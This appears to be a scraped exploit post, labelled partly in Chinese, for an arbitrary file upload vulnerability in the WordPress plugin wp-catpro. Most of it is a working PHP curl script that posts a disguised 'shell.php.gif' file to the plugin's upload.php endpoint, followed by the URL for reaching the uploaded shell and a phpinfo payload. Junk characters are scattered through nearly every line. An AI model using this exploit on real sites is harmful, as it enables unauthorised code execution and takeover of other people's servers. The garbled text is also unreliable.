Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability$ w: Z* G- s2 Z
#-----------------------------------------------------------------------
. T6 l+ o( T0 [( S+ d" ~" _ * ^; i7 b# b& s6 z) O
作者 => Zikou-16
+ a; d* X* T9 w4 e9 s0 p- Q邮箱 => zikou16x@gmail.com
6 c9 W: v# ]+ i5 E- c$ a( X测试系统 : Windows 7 , Backtrack 5r34 G# |4 _, L* _* @
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
0 r% r" ?* B4 a0 r####/ w+ r9 b d# b* a3 k' L* C) N
; X% T+ T+ z! C7 |' c#=> Exploit 信息:+ q9 j) G$ @/ G2 d4 j
------------------: L& B* T) B7 E A" @2 l( c, r
# 攻击者可以上传 file/shell.php.gif* x* z0 S# l q* A3 v! N1 R
# ("jpg", "gif", "png") // Allowed file extensions
$ [. }* ~, m ~) f# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)" O8 I; R1 O: U
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
3 }+ |, N5 U0 |* O' E/ j7 A------------------
" {, }0 _0 f- t; `8 {' S * n2 p: g3 i8 A, g" E7 t
#=> Exploit5 s: U6 `( y: Y: s' `
-----------
9 n* G# B! E. z$ r<?php1 b4 \* P( k6 w5 P
" \' t0 G% ^* @
$uploadfile="zik.php.gif";
5 {# [4 c+ o6 e, B5 P+ N' ^0 {9 H$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
9 o* ]1 |& e I8 q% B: {8 [3 ucurl_setopt($ch, CURLOPT_POST, true);/ c% E+ N% L; N7 b* v
curl_setopt($ch, CURLOPT_POSTFIELDS,* V! R) c* H4 j) Y3 I" V
array('Filedata'=>"@$uploadfile",
1 d: t" ~1 `6 F; M1 A, Y$ J'folder'=>'/wp-content/uploads/catpro/'));/ v% W; u. [6 q5 @
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);; S9 Q' l# b4 [) `* F- C
$postResult = curl_exec($ch);/ H. Q4 R: k3 B' @6 J
curl_close($ch);( J8 U' G- D, s- l3 z
; v7 c7 E) \; \4 F! @2 lprint "$postResult";6 }2 I( F' g% C; g* V% o
! f% W5 m! }( U) y# x) {) J
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
5 a& E% |' K( r3 ]/ ` ?>" o6 ?: l7 X% u7 v# N
<?php
7 _* V+ d- B! w9 g9 dphpinfo();
Z n; c* }1 b?> |